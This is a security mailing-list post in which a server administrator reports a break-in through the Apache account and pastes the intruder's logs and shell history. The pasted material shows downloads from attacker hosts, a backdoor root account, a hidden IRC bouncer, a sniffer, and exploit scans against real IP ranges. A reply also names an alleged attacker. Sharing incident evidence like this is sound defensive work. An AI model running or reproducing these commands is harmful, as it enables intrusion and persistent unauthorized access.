curiosity kills the cat:
http://www.vulturul.org/ = A romanian guy, 18years old, his name is Brisan
Andrei :)
----- Original Message -----
From: "Marco Lum"
Help, Help, Somebody help!!!
I Found somebody gain access using wwwrun, Download programs and try to hack into other server.
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use bind: Address already in use --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,748 [application/x-gzip]
0K .......... ......... 100% 65.37 KB/s
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain]
0K .......... ... 100% 3.37 KB/s
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied chmod: invalid mode string: `x' sh: line 1: ./a.out: Permission denied Bad syntax, perhaps a bogus '-'?
sh: line 1: cd: /tmp/vulturu: No such file or directory --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.67 KB/s
20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
tar: Error exit delayed from previous errors
sh: line 1: cd: /tmp/": No such file or directory
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M; cd /usr/local/games/ ls -ax wget www.vulturul.org/vulturul/bnc.tgz cd /tmp/" " socklist killall -9 nsl ls -ax rm -rf epcs2 rm -rf ns rm -rf nsl rm -rf p rm -rf pk ls -ax wget www.vulturul.org/vulturul/bnc.tgz tar xvfz bnc.tgz mv psybnc "~. " cd "~. " mv psybnc " " export PATH=:PATH ./" " id ls --color ./li ls --color ./p exec ./p 8003 id pwd cd .. cd .. ls -ax ls -ax --color rm -rf edu.gz rm -rf local.tar.gz rm -rf local cd 3du ls --colorls --color ./scan 200.13.230.37 ./scan 200.13.230.37 -d 6 ./scan 202.30.198.226 -d 6 /scan 202.186.250.157 ./scan ./scan 202.186.250.157 ./scan 202.186.250.157 -d 6 ./scan 64.106.104.84 -d 6 ./scan 64.106.104.84 -d 6 ./scan 128.119.213.136 -d 2 d .. cd .. ls -ax cd atd ls -ax ./osslmass2 mass.log ./osslmass2 mass.log cd ../atd ls -ax cd .. ls -ax --color pico ./pico mv pico /usr/bin pico ls -ax mv pico /usr/bin cp pico /usr/bin/pico cd 3du ls -ax --color cd .. wget http://geocities.com/supers7ar/boom.tar.gz tar xvfz boom.tar.gz cd boom ls -ax ./r00t./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./r00t -t 193.231.142 -d 4 ./r00t -t 193.231.142 -d 7 ./r00t -t 193.231.142 -d 8 cd .. pwd wget http://geocities.com/supers7ar/sshup.tar.gz tar xvfz sshup.tar.gz cd ssh-3.0.1/ ls -ax cd .. rm -rf ssh-3.0.1/ rm -rf sshup.tar.gz ls -ax --color rm -rf boom.tar.gz cd ~. cd " ~.
q
q
}
q
exit
ls -ax wget www.vulturul.org/vulturul/linsniffer chmod +x linsniffer ./linsniffer ls -ax rm -rf linsniffer ls -ax --color id ./heh
./r00t -t 128.100.20 -d 8 ./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2
./scan 200.13.230.37
Please help, I Can't found where he can get in~~!
-- Marco Lum Net Service Manager
____________________________________________________________________________ _______________
System Development Service Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com
HK Service Company HK Service Consultants Limited
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here